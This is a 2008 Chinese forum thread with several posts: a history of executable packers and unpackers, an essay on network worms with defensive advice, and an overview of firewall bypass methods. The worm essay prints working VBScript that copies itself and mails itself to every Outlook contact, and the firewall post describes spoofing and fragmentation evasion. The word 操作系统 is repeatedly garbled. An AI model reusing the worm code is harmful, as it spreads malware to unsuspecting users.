   最早提出“壳”这个概念的,据我所知,应该是当年推出脱壳软件 RCOPY 3 的作者熊焰先生。在几年前的 DOS 时代,“壳”一般都是指磁盘加密软件的段加密程序,可能是那时侯的加密软件还刚起步不久吧,所以大多数的加密软件(加壳软件)所生成的“成品”在“壳”和需要加密的程序之间总有一条比较明显的“分界线”。有经验的人可以在跟踪软件的运行以后找出这条分界线来,至于这样有什么用这个问题,就不用我多说了。但毕竟在当时,甚至现在这样的人也不是很多,所以当 RCOPY3 这个可以很容易就找出“分界线”,并可以方便的去掉“壳”的软件推出以后,立即就受到了很多人的注意。老实说,这个我当年在《电脑》杂志看到广告,在广州电脑城看到标着999元的软件,在当时来说,的确是有很多全新的构思,单内存生成 EXE 可执行文件这项,就应该是世界首创了。但它的思路在程序的表现上我认为还有很多可以改进的地方(虽然后来出现了可以加强其功力的 RO97),这个想法也在后来和作者的面谈中得到了证实。在这以后,同类型的软件想雨后春笋一般冒出来,记得住名字的就有: UNKEY、MSCOPY、UNALL .... 等等,但很多的软件都把磁盘解密当成了主攻方向,忽略了其它方面,当然这也为以后的“密界克星”“解密机器”等软件打下了基础,这另外的分支就不多祥谈了,相信机龄大一点的朋友都应该看过当时的广告了。

   解密(脱壳)技术的进步促进、推动了当时的加密(加壳)技术的发展。LOCK95和 BITLOK 等所谓的“壳中带籽”加密程序纷纷出笼,真是各出奇谋,把小小的软盘也折腾的够辛苦的了。正在国内的加壳软件和脱壳软件较量得正火红的时候,国外的“壳” 类软件早已经发展到像 LZEXE 之类的压缩壳了。这类软件说穿了其实就是一个标准的加壳软件,它把 EXE 文件压缩了以后,再在文件上加上一层在软件被执行的时候自动把文件解压缩的“壳”来达到压缩 EXE 文件的目的。接着,这类软件也越来越多, PKEXE、AINEXE、UCEXE 和后来被很多人认识的 WWPACK 都属于这类软件,但奇怪的是,当时我看不到一个国产的同类软件。

   过了一段时间,可能是国外淘汰了磁盘加密转向使用软件序列号的加密方法吧,保护 EXE 文件不被动态跟踪和静态反编译就显得非常重要了。所以专门实现这样功能的加壳程序便诞生了。 MESS 、CRACKSTOP、HACKSTOP、TRAP、UPS 等等都是比较有名气的本类软件代表,当然,还有到现在还是数一数二的,由中国台湾同胞所写的 FSE 。其实以我的观点来看,这样的软件才能算是正宗的加壳软件。

  在以上这些加壳软件的不断升级较劲中,很多软件都把比较“极端”技术用了上去,因为在这个时候 DOS 已经可以说是给众高手们玩弄在股掌之间了,什么保护模式、反 SICE 、逆指令等等。相对来说,在那段时间里发表的很多国外脱壳程序,根本就不能对付这么多的加壳大军,什么 UPC、TEU 等等都纷纷成为必防的对象,成绩比较理想的就只有 CUP386 了,反观国内,这段时间里也没了这方面的“矛盾斗争”。加壳软件门挥军直捣各处要岗重地,直到在我国遇到了 TR 这个铜墙铁壁以后,才纷纷败下阵来各谋对策,但这已经是一年多以后的事情了。我常想,如果 TR 能早两年“出生”的话,成就肯定比现在大得多,甚至盖过 SICE 也有可能。TR 发表的时候 WIN95 的流行已经成为事实,DOS 还有多少的空间,大家心里都清楚。但话又说回来, TR 的确是个好软件,比起当年的 RCOPY3 有过之而无不及,同时也证明了我们中国的 CRACK 实力(虽然有点过时)。这个时候,前面提到过的 FSE 凭着强劲的实力也渐渐的浮出了水面,独领风骚。其时已经是 1997 年年底了,我也走完了学生“旅程”。工作后在CFIDO 的 CRACK 区认识了 Ding-Boy ,不久 CRACK 区关了,我从此迷上了 INTERNET,并于98年6月建起了一个专门介绍“壳”的站台: http://topage.126.com ,放上了我所收集的所有“壳”类软件。在这段时间里,各种“壳”类软件也在不段的升级换代,但都没什么太大的进展,差不多就是 TR 和众加壳软件的版本数字之争而已。

?? 1998年8月,一个名为 UNSEC (揭秘)的脱壳软件发表了,它号称可以脱掉98年8月以前发表的所有壳。我测试之后,觉得并没传闻中的那么厉害,特别是兼容性更是令我不想再碰它。 Ding-Boy 给这个软件的作者提了很多建议,但寄去的 EMIAL 有如泥牛入海,可能是一怒之下吧,不久 Ding-Boy 的 BW (冲击波)就诞生了。这个使用内存一次定位生成 EXE 文件(后来放弃了)的脱壳软件,在我的站台公开后,得到了很多朋友们的肯定。要知道,从RCOPY 3 开始,绝大部分的脱壳软件都是要两次运行目标程序来确定 EXE 的重定位数据的。BW 的这一特点虽然有兼容性的问题,但也树立了自己的风格、特色。经过几个月的改善, BW 升级到了 2.0 版本,这个版本的推出可以说是 BW 的转折点,因为它已经是一个成熟、稳定脱壳软件了,它可以对付当时(现在)大多数的壳,包括当时最新的 FSE 0.6 等。更重要的是这个版本把选择壳的和软件“分界线”这个最令新手头疼的步骤简化到不能再简化的地步,使更多的朋友接受了它。另外,能加强 BW 功力的 CI 模式也是其它脱壳软件没有的东西。最近,BW 发表了最新的 2.5 BETA2 版本,增强了一些方面的功能,因它竟然可以脱掉号称最厉害的磁盘加密工具 LOCKKING 2.0 的加密壳,因而进一步奠定了它在“脱壳界”的地位。说到最新,就不能不提 GTR、LTR、EDUMP、ADUMP、UPS、UPX、APACK 这几个国外的好软件了,它们每个都有自己的特色,可以说都是当今各类“壳”中的最新代表了。(这些软件和详细介绍请到我的主页查阅)

  由于 WINDOWS 3.1 只是基于 DOS 下的一个图形外壳,所以在这个平台下的“壳”类软件很少,见过的就只有像 PACKWIN 等几个有限的压缩工具,终难成气候。

   可能是 MICROSOFT 保留了 WIN95 的很多技术上的秘密吧,所以即便是 WIN95 已经推出了 3 年多的时间,也没见过在其上面运行的“壳”类软件。直到 98 年的中期,这样的软件才迟迟的出现,而这个时候 WIN98 也发表了有一段日子了。应该是有 DOS 下的经验吧,这类的软件不发表由自可,一发表就一大批地的冲了出来。先是加壳类的软件如: BJFNT、PELOCKNT 等,它们的出现,使暴露了 3 年多的 WIN95 下的 PE 格式 EXE 文件得到了很好的保护。大家都应该知道现在很多 WIN95 下的软件都是用注册码的方法来区分、确定合法与非法用户的吧,有了这类加壳软件,这种注册方法的安全性提高了不少,如果大家也有自己编的 WIN95 程序,就一定要多留意一下本类软件了。接着出现的就是压缩软件了,因为 WIN95 下运行的 EXE 文件“体积”一般都比较大,所以它的实用价值比起 DOS 下的压缩软件要大很多,这类的软件也很多,早些时候的 VBOX、PEPACK、PETITE 和最近才发表的 ASPACK、UPX 都是其中的佼佼者。在 DOS 下很流行的压缩软件 WWPACK 的作者也推出了对应 WIN95 版本的 WWPACK32,由于性能并不是十分的突出,所以用的人也不太多。由于压缩软件其实也是间接给软件加了壳,所以用它们来处理 EXE 也是很多软件作者喜欢做的事情,最近新发表的很多软件里都可以看到这些加壳、加压缩软件的名字了。有加壳就一定会有脱壳的,在 WIN95 下当然也不例外,但由于编这类软件比编加壳软件要难得多,所以到目前为止,我认为就只有 PROCDUMP 这个软件能称为通用脱壳软件了,它可以对付现在大多数的加壳、压缩软件所加的壳,的确是一个难得的精品。其它的脱壳软件多是专门针对某某加壳软件而编,虽然针对性强、效果好,但收集麻烦,而且这样的脱壳软件也不多。前些时候 TR 作者也顺应潮流发表了 TR 的 WIN95 版本: TRW ,由现在的版本来看可以对付的壳还不多,有待改进。

  BW 的作者 Ding-Boy 最新发表了一个 WIN95 的 EXE 加壳软件 DBPE 。虽然它还不太成熟,但它可以为软件加上使用日期限制这个功能是其它加壳软件所没有的,或者以后的加壳软件真的会是像他说的那样可以:加壳和压缩并重、并施;随意加使用日期;加上注册码;加软件狗(磁盘)保护;加硬件序列号判别;加... 。






一.壳的概念
作者编好软件后,编译成exe可执行文件
1.有一些版权信息需要保护起来,不想让别人随便改动,如作者的姓名等
2.需要把程序搞的小一点,从而方便使用
于是,需要用到一些软件,他们能将exe可执行文件压缩,实现上述两个功能,这些软件称为加壳软件或压缩软件.
它不同于一般的winzip,winrar等压缩软件.它是压缩exe可执行文件的,压缩后的文件可以直接运行.
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 52 发表于: 2008-06-14 22:48:30
蠕虫技术(下)

2.3企业防范蠕虫病毒措施
此次sql蠕虫病毒,利用的漏洞在2002年7月份微软的一份安全公告中

就有详细说明!而且微软也提供了安全补丁提供下载,然而在时隔半

年之后互联网上还有相当大的一部分服务器没有安装最新的补丁,其

网络管理员的安全防范意识可见一斑!
当前,企业网络主要应用于文件和打印服务共享、办公自动化系统、

企业业务(MIS)系统、Internet应用等领域。网络具有便利信息交

换特性,蠕虫病毒也可以充分利用网络快速传播达到其阻塞网络目的

。企业在充分地利用网络进行业务处理时,就不得不考虑企业的病毒

防范问题,以保证关系企业命运的业务数据完整不被破坏。
企业防治蠕虫病毒的时候需要考虑几个问题:病毒的查杀能力,病毒

的监控能力,新病毒的反应能力。而企业防毒的一个重要方面是是管

理和策略。推荐的企业防范蠕虫病毒的策略如下:
1. 加强网络管理员安全管理水平,提高安全意识。由于蠕虫病毒利

用的是系统漏洞进行攻击,所以需要在第一时间内保持系统和应用软

件的安全性,保持各种想跳楼作系统和应用软件的更新!由于各种漏洞的

出现,使得安全不在是一种一劳永逸的事,而作为企业用户而言,所

经受攻击的危险也是越来越大,要求企业的管理水平和安全意识也越

来越高!
2. 建立病毒检测系统。能够在第一时间内检测到网络异常和病毒攻

击。
3. 建立应急响应系统,将风险减少到最小!由于蠕虫病毒爆发的突

然性,可能在病毒发现的时候已经蔓延到了整个网络,所以在突发情

况下,建立一个紧急响应系统是很有必要的,在病毒爆发的第一时间

即能提供解决方案。
4. 建立灾难备份系统。对于数据库和数据系统,必须采用定期备份

,多机备份措施,防止意外灾难下的数据丢失!
5. 对于局域网而言,可以采用以下一些主要手段:(1)在因特网

接入口处安装防火墙式防杀计算机病毒产品,将病毒隔离在局域网之

外。(2)对邮件服务器进行监控,防止带毒邮件进行传播!(3)对

局域网用户进行安全培训。(4)建立局域网内部的升级系统,包括

各种想跳楼作系统的补丁升级,各种常用的应用软件升级,各种杀毒软件

病毒库的升级等等!





.3对个人用户产生直接威胁的蠕虫病毒
在以上分析的蠕虫病毒中,只对安装了特定的微软组件的系统进行攻

击,而对广大个人用户而言,是不会安装iis(微软的因特网服务器程

序,可以使允许在网上提供web服务)或者是庞大的数据库系统的!因

此上述病毒并不会直接攻击个个人用户的电脑(当然能够间接的通过

网络产生影响),但接下来分析的蠕虫病毒,则是对个人用户威胁最

大,同时也是最难以根除,造成的损失也更大的一类蠕虫病毒!
对于个人用户而言,威胁大的蠕虫病毒采取的传播方式一般为电子邮

件(Email)以及恶意网页等等!
对于利用email传播得蠕虫病毒来说,通常利用的是社会工程学

(Social Engineering),即以各种各样的欺骗手段那诱惑用户点击的

方式进行传播!
恶意网页确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用

户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病

毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,

在很多黑客网站竟然出现了关于用网页进行破坏的技术的论坛,并提

供破坏程序代码下载,从而造成了恶意网页的大面积泛滥,也使越来

越多的用户遭受损失。
对于恶意网页,常常采取vb script和java script编程的形式!由于

编程方式十分的简单!所以在网上非常的流行!
Vb script和java script是由微软想跳楼作系统的wsh(Windows

scripting HostWindows脚本主机)解析并执行的,由于其编程非常

简单,所以此类脚本病毒在网上疯狂传播,疯狂一时的爱虫病毒就是

一种vbs脚本病毒,然后伪装成邮件附件诱惑用户点击运行,更为可

怕的是,这样的病毒是以源代码的形式出现的,只要懂得一点关于脚

本编程的人就可以修改其代码,形成各种各样的变种。
下面以一个简单的脚本为例:
Set objFs=CreateObject (“scripting.FileSystemObject”)(创

建一个文件系统对象)  objFs.CreateTextFile

("C:\virus.txt", 1)(通过文件系统对象的方法创建了TXT文件) 

 如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘

中创建一个TXT文件了。倘若我们把第二句改为:
objFs.GetFile (Wscript.scriptFullName).Copy

("C:\virus.vbs")
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚

本文件,Wscript.scriptFullName指明是这个程序本身,是一个完整

的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复

制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我

复制的功能,已经具备病毒的基本特征——自我复制能力。
此类病毒往往是通过邮件传播的,在vb script中调用邮件发送功能

也非常的简单,病毒往往采用的方法是向outlook中的地址薄中的邮

件地址发送带有包含自身的邮件来达到传播目的,一个简单的实例如

下:
Set objOA=Wscript.CreateObject ("Outlook.Application")(创

建一个OUTLOOK应用的对象)
Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间


For i=1 to objMapi.AddressLists.Count(遍历地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))

(取得收件人邮件地址 )  objMail.Subject="你好!" (设置邮

件主题,这个往往具有很大的诱惑性质)
objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容


objMail.Attachments.Add (“c:\virus.vbs")(把自己作为附件

扩散出去 )
objMail.Send  (发送邮件)
Next
Next
Set objMapi=Nothing  (清空objMapi变量,释放资源)
set objOA=Nothing  (清空objOA变量)
  这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自

己作为附件扩散出去。这段代码中的第一行是创建一个Outlook的对

象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中

的电子邮件地址发送内容相同的信件。这就是蠕虫的传播性。
由此可以看出,利用vb script编写病毒是非常容易的,这就使得此

类病毒的变种繁多,破坏力极大,同时也是非常难以根除的!
2.4个人用户对蠕虫病毒的防范措施
通过上述的分析,我们可以知道,病毒并不是非常可怕的,网络蠕虫

病毒对个人用户的攻击主要还是通过社会工程学,而不是利用系统漏

洞!所以防范此类病毒需要注意以下几点:




1.购合适的杀毒软件!网络蠕虫病毒的发展已经使传统的杀毒软件

的“文件级实时监控系统”落伍,杀毒软件必须向内存实时监控和邮

件实时监控发展!另外面对防不胜防的网页病毒,也使得用户对杀毒

软件的要求越来越高!在杀毒软件市场上,赛门铁克公司的norton系

列杀毒软件在全球具有很大的比例!经过多项测试,norton杀毒系列

软件脚本和蠕虫阻拦技术能够阻挡大部分电子邮件病毒,而且对网页

病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的

水平.像瑞星,kv系列等杀毒软件,在杀毒软件的同时整合了防火强功

能,从而对蠕虫兼木马程序有很大克制作用.
2 。经常升级病毒库,杀毒软件对病毒的查杀是以病毒的特征码为依

据的,而病毒每天都层出不穷,尤其是在网络时代,蠕虫病毒的传播速

度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!
3.提高防杀毒意识.不要轻易去点击陌生的站点,有可能里面就含有

恶意代码!
当运行IE时,点击“工具→Internet选项→安全→ Internet区域的

安全级别”,把安全级别由“中”改为“高” 。、因为这一类网页

主要是含有恶意代码的ActiveX或Applet、 javascript的网页文件

,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可

以大大减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点

击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标

签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把

其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”

。但是,这样做在以后的网页浏览过程中有可能会使一些正常应用

ActiveX的网站无法浏览。
4.不随意查看陌生邮件,尤其是带有附件的邮件,,由于有的病毒

邮件能够利用ie和outlook的漏洞自动执行,所以计算机用户需要升

级ie和outlook程序,及常用的其他应用程序!


三小结
网络蠕虫病毒作为一种互联网高速发展下的一种新型病毒,必将对网

络产生巨大的危险。在防御上,已经不再是由单独的杀毒厂商所能够

解决,而需要网络安全公司,系统厂商,防病毒厂商及用户共同参与

,构筑全方位的防范体系!
蠕虫和黑客技术的结合,使得对蠕虫的分析,检测和防范具有一定的

难度,同时对蠕虫的网络传播性,网络流量特性建立数学模型也是有

待研究的工作!
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 51 发表于: 2008-06-14 22:48:09
蠕虫技术(中)

可以预见,未来能够给网络带来重大灾难的主要必定是网络蠕虫!
1.3蠕虫的破坏和发展趋势
1988年一个由美国CORNELL大学研究生莫里斯编写的蠕虫病毒蔓延造

成了数千台计算机停机,蠕虫病毒开始现身网络;而后来的红色代码

,尼姆达病毒疯狂的时候,造成几十亿美元的损失;北京时间2003年1

月26日, 一种名为“2003蠕虫王”的电脑病毒迅速传播并袭击了全球

,致使互联网网路严重堵塞,作为互联网主要基础的域名服务器

(DNS)的瘫痪造成网民浏览互联网网页及收发电子邮件的速度大幅

减缓, 同时银行自动提款机的运作中断, 机票等网络预订系统的运作

中断, 信用卡等收付款系统出现故障!专家估计,此病毒造成的直接经

济损失至少在12亿美元以上!
病毒名称 持续时间 造成损失
莫里斯蠕虫 1988年 6000多台计算机停机,直接经济损失达9600万美

元!
美丽杀手 1999年3月 政府部门和一些大公司紧急关闭了网络服务器,

经济损失超过12亿美元!
爱虫病毒 2000年5月至今 众多用户电脑被感染,损失超过100亿美元

以上,
红色代码 2001年7月 网络瘫痪,直接经济损失超过26亿美元
求职信 2001年12月至今 大量病毒邮件堵塞服务器,损失达数百亿美


Sql蠕虫王 2003年1月 网络大面积瘫痪,银行自动提款机运做中断,直

接经济损失超过26亿美元
由表可以知道,蠕虫病毒对网络产生堵塞作用,并造成了巨大的经济损

失!
通过对以上蠕虫病毒的分析,可以知道,蠕虫发作的一些特点和发展趋

势:
1.利用想跳楼作系统和应用程序的漏洞主动进行攻击.. 此类病毒主要是

“红色代码”和“尼姆达”,以及至今依然肆虐的”求职信”等.由于

IE浏览器的漏洞(Iframe ExecCommand),使得感

染了“尼姆达”病毒的邮件在不去手工打开附件的情况下病毒就能激

活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件

,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软

IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播。Sql蠕虫王

病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击!
2传播方式多样 如“尼姆达”病毒和”求职信”病毒,可利用的传播

途径包括文件、电子邮件、Web服务器、网络共享等等.
  3.病毒制作技术新 与传统的病毒不同的是,许多新病毒是利用当

前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从

而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VB

script等技术,可以潜伏在HTML页面里,在上网浏览时触发。  




4.与黑客技术相结合! 潜在的威胁和损失更大!以红色代码为例,

感染后的机器的web目录的\scripts下将生成一个root.exe,可以远程

执行任何命令,从而使黑客能够再次进入!


二网络蠕虫病毒分析和防范
蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里

的漏洞或者说是缺陷,我们分为2种,软件上的缺陷和人为上的缺陷

。软件上的缺陷,如远程溢出,微软ie和outlook的自动执行漏洞等

等,需要软件厂商和用户共同配合,不断的升级软件。而人为的缺陷

,主要是指的是计算机用户的疏忽。这就是所谓的社会工程学

(social engineering),当收到一封邮件带着病毒的求职信邮件时候

,大多数人都会报着好奇去点击的。对于企业用户来说,威胁主要集

中在服务器和大型应用软件的安全上,而个人用户而言,主要是防范

第二种缺陷。
2.1利用系统漏洞的恶性蠕虫病毒分析
在这种病毒中,以红色代码,尼姆达和sql蠕虫为代表!他们共同的特征

是利用微软服务器和应用程序组件的某个漏洞进行攻击,由于网上存

在这样的漏洞比较普遍,使得病毒很容易的传播!而且攻击的对象大都

为服务器,所以造成的网络堵塞现象严重!
以2003年1月26号爆发的sql蠕虫为例,爆发数小时内席卷了全球网络,

造成网络大塞车.亚洲国家中以人口上网普及率达七成的韩国所受影

响较为严重。韩国两大网络业KFT及南韩电讯公司,系统都陷入了瘫

痪,其它的网络用户也被迫断线,更为严重的是许多银行的自动取款

机都无法正常工作, 美国许美国银行统计,该行的13000台自动柜员

机已经无法提供正常提款。网络蠕虫病毒开始对人们的生活产生了巨

大的影响!
这次sql蠕虫攻击的是微软数据库系Microsoft SQL Server 2000的,

利用了MSSQL2000服务远程堆栈缓冲区溢出漏洞, Microsoft SQL

Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统

。 SQL Server监听UDP的1434端口,客户端可以通过发送消息到这个

端口来查询目前可用的连接方式(连接方式可以是命名管道也可以是

TCP),但是此程序存在严重漏洞,当客户端发送超长数据包时,将

导致缓冲区溢出,黑客可以利用该漏洞在远程机器上执行自己的恶意

代码。
微软在200年7月份的时候就为这个漏洞发布了一个安全公告,但当sql

蠕虫爆发的时候,依然有大量的装有ms sqlserver 2000的服务器没有

安装最新的补丁,从而被蠕虫病毒所利用,蠕虫病毒通过一段376个字

节的恶意代码,远程获得对方主机的系统控制权限, 取得三个Win32

API地址,GetTickCount、socket、sendto,接着病毒使用

GetTickCount获得一个随机数,进入一个死循环继续传播。在该循环

中蠕虫使用获得的随机数生成一个随机的ip地址,然后将自身代码发

送至1434端口(Microsoft SQL Server开放端口),该蠕虫传播速度极

快,其使用广播数据包方式发送自身代码,每次均攻击子网中所有

255台可能存在机器。由于这是一个死循环的过程,发包密度仅和机

器性能和网络带宽有关,所以发送的数据量非常大。该蠕虫对被感染

机器本身并没有进行任何恶意破坏行为,也没有向硬盘上写文件,仅

仅存在与内存中。对于感染的系统,重新启动后就可以清除蠕虫,但

是仍然会重复感染。由于发送数据包占用了大量系统资源和网络带宽

,形成Udp Flood,感染了该蠕虫的网络性能会极度下降。一个百兆

网络内只要有一两台机器感染该蠕虫就会导致整个网络访问阻塞。
通过以上分析可以知道,此蠕虫病毒本身除了对网络产生拒绝服务攻

击外,并没有别的破坏措施.但如果病毒编写者在编写病毒的时候加入

破坏代码,后果将不堪设想!
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 50 发表于: 2008-06-14 22:47:52
蠕虫技术(上)

凡能够引起计算机故障,破坏计算机数据的程序统称为计算

机病毒。所以从这个意义上说,蠕虫也是一种病毒!网络蠕虫病毒,

作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽

视.与传统的病毒不同,蠕虫病毒以计算机为载体,以网络为攻击对

象!本文中将蠕虫病毒分为针对企业网络和个人用户2类,并从企业

用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!
本文根据蠕虫病毒的发作机制,将其分为利用系统级别漏洞(主动传

播)和利用社会工程学(欺骗传播)两种,并从用户角度中将蠕虫病毒

分为针对企业网络和个人用户2类,从企业用户和个人用户两个方面

探讨蠕虫病毒的特征和一些防范措施!
一 蠕虫病毒定义
1蠕虫病毒的定义
2蠕虫病毒与一般病毒的异同
3蠕虫病毒的危害和趋势
二 蠕虫病毒的分析和防范
1企业用户的防止蠕虫
2个人用户防止蠕虫
三 研究蠕虫的现实意义
一 蠕虫病毒的定义
1.1蠕虫病毒的定义
计算机病毒自出现之日起,就成为计算机的一个巨大威胁,而当网络

迅速发展的时候,蠕虫病毒引起的危害开始显现!从广义上定义,凡

能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。所

以从这个意义上说,蠕虫也是一种病毒!但是蠕虫病毒和一般的病毒

有着很大的区别.对于蠕虫,现在还没有一个成套的理论体系,一般认

为,蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如

传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文

件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客

技术相结合等等!在产生的破坏性上,蠕虫病毒也不是普通病毒所能

比拟的,网络的发展使得蠕虫可以在短短的时间内蔓延整个网络,造

成网络瘫痪!
在本论文中,根据使用者情况将蠕虫病毒分为2类,一种是面向企业用

户和局域网而言,这种病毒利用系统漏洞,主动进行攻击,可以对整个

互联网可造成瘫痪性的后果!以“红色代码”,“尼姆达”,以及最

新的“sql蠕虫王”为代表。另外一种是针对个人用户的,通过网络(

主要是电子邮件,恶意网页形式)迅速传播的蠕虫病毒,以爱虫病毒,求

职信病毒为例.在这两类中,第一类具有很大的主动攻击性,而且爆

发也有一定的突然性,但相对来说,查杀这种病毒并不是很难。第二

种病毒的传播方式比较复杂和多样,少数利用了微软的应用程序的漏

洞,更多的是利用社会工程学()对用户进行欺骗和诱使,这样的病毒

造成的损失是非常大的,同时也是很难根除的,比如求职信病毒,在

2001年就已经被各大杀毒厂商发现,但直到2002年底依然排在病毒危

害排行榜的首位就是证明!出得在接下来的内容中,将分别分析这两

种病毒的一些特征及防范措施!





1.2蠕虫病毒与一般病毒的异同
蠕虫也是一种病毒,因此具有病毒的共同特征。一般的病毒是需要的

寄生的,它可以通过自己指令的执行,将自己的指令代码写到其他程

序的体内,而被感染的文件就被称为”宿主”,例如,windows下可执

行文件的格式为pe格式(Portable Executable),当需要感染pe文件时

,在宿主程序中,建立一个新节,将病毒代码写到新节中,修改的程

序入口点等,这样,宿主程序执行的时候,就可以先执行病毒程序,

病毒程序运行完之后,在把控制权交给宿主原来的程序指令。可见,

病毒主要是感染文件,当然也还有像DIRII这种链接型病毒,还有引

导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,

这张软盘用在其他机器上后,同样也会感染其他机器,所以传播方式

也是用软盘等方式。
蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网

环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而

言,而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的

共享文件夹,电子邮件email,网络中的恶意网页,大量存在着漏洞的

服务器等都成为蠕虫传播的良好途径。网络的发展也使得蠕虫病毒可

以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使

得人们手足无策!
普通病毒 蠕虫病毒
存在形式 寄存文件 独立程序
传染机制 宿主程序运行 主动攻击
传染目标 本地文件 网络计算机
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 49 发表于: 2008-06-14 22:47:30
如何突破各种防火墙

现在随着人们的安全意识加强,防火墙一般都被公司企业采用来保障网络的安全,一般的攻击者在有防火墙的情况下,一般是很难入侵的。下面谈谈有防火墙环境下的攻击和检测。

  一 防火墙基本原理

  首先,我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤,和状态检测的包过滤,应用层代理防火墙。但是他们的基本实现都是类似的。

│ │---路由器-----网卡│防火墙│网卡│----------内部网络│ │

  防火墙一般有两个以上的网络卡,一个连到外部(router),另一个是连到内部网络。当打开主机网络转发功能时,两个网卡间的网络通讯能直接通过。当有防火墙时,他好比插在网卡之间,对所有的网络通讯进行控制。

  说到访问控制,这是防火墙的核心了:),防火墙主要通过一个访问控制表来判断的,他的形式一般是一连串的如下规则:

  1 accept from+ 源地址,端口 to+ 目的地址,端口+ 采取的动作

  2 deny ...........(deny就是拒绝。。)

  3 nat ............(nat是地址转换。后面说)

  防火墙在网络层(包括以下的炼路层)接受到网络数据包后,就从上面的规则连表一条一条地匹配,如果符合就执行预先安排的动作了!如丢弃包。。。。

  但是,不同的防火墙,在判断攻击行为时,有实现上的差别。下面结合实现原理说说可能的攻击。


  二 攻击包过滤防火墙

  包过滤防火墙是最简单的一种了,它在网络层截获网络数据包,根据防火墙的规则表,来检测攻击行为。他根据数据包的源IP地址;目的IP地址;TCP/UDP源端口;TCP/UDP目的端口来过滤!!很容易受到如下攻击:

  1 ip 欺骗攻击:

  这种攻击,主要是修改数据包的源,目的地址和端口,模仿一些合法的数据包来骗过防火墙的检测。如:外部攻击者,将他的数据报源地址改为内部网络地址,防火墙看到是合法地址就放行了:)。可是,如果防火墙能结合接口,地址来匹配,这种攻击就不能成功了:(

  2 d.o.s拒绝服务攻击

  简单的包过滤防火墙不能跟踪 tcp的状态,很容易受到拒绝服务攻击,一旦防火墙受到d.o.s攻击,他可能会忙于处理,而忘记了他自己的过滤功能。:)你就可以饶过了,不过这样攻击还很少的。!

  3 分片攻击

  这种攻击的原理是:在IP的分片包中,所有的分片包用一个分片偏移字段标志分片包的顺序,但是,只有第一个分片包含有TCP端口号的信息。当IP分片包通过分组过滤防火墙时,防火墙只根据第一个分片包的Tcp信息判断是否允许通过,而其他后续的分片不作防火墙检测,直接让它们通过。

  这样,攻击者就可以通过先发送第一个合法的IP分片,骗过防火墙的检测,接着封装了恶意数据的后续分片包就可以直接穿透防火墙,直接到达内部网络主机,从而威胁网络和主机的安全。

  4 木马攻击

  对于包过滤防火墙最有效的攻击就是木马了,一但你在内部网络安装了木马,防火墙基本上是无能为力的。

  原因是:包过滤防火墙一般只过滤低端口(1-1024),而高端口他不可能过滤的(因为,一些服务要用到高端口,因此防火墙不能关闭高端口的),所以很多的木马都在高端口打开等待,如冰河,subseven等。。。

  但是木马攻击的前提是必须先上传,运行木马,对于简单的包过滤防火墙来说,是容易做的。这里不写这个了。大概就是利用内部网络主机开放的服务漏洞。
  
  早期的防火墙都是这种简单的包过滤型的,到现在已很少了,不过也有。现在的包过滤采用的是状态检测技术,下面谈谈状态检测的包过滤防火墙。

  三 攻击状态检测的包过滤

  状态检测技术最早是checkpoint提出的,在国内的许多防火墙都声称实现了状态检测技术。

  可是:)很多是没有实现的。到底什么是状态检测?

  一句话,状态检测就是从tcp连接的建立到终止都跟踪检测的技术。

  原先的包过滤,是拿一个一个单独的数据包来匹配规则的。可是我们知道,同一个tcp连接,他的数据包是前后关联的,先是syn包,-》数据包=》fin包。数据包的前后序列号是相关的。
 
  如果割裂这些关系,单独的过滤数据包,很容易被精心够造的攻击数据包欺骗!!!如nmap的攻击扫描,就有利用syn包,fin包,reset包来探测防火墙后面的网络。!

  相反,一个完全的状态检测防火墙,他在发起连接就判断,如果符合规则,就在内存登记了这个连接的状态信息(地址,port,选项。。),后续的属于同一个连接的数据包,就不需要在检测了。直接通过。而一些精心够造的攻击数据包由于没有在内存登记相应的状态信息,都被丢弃了。这样这些攻击数据包,就不能饶过防火墙了。

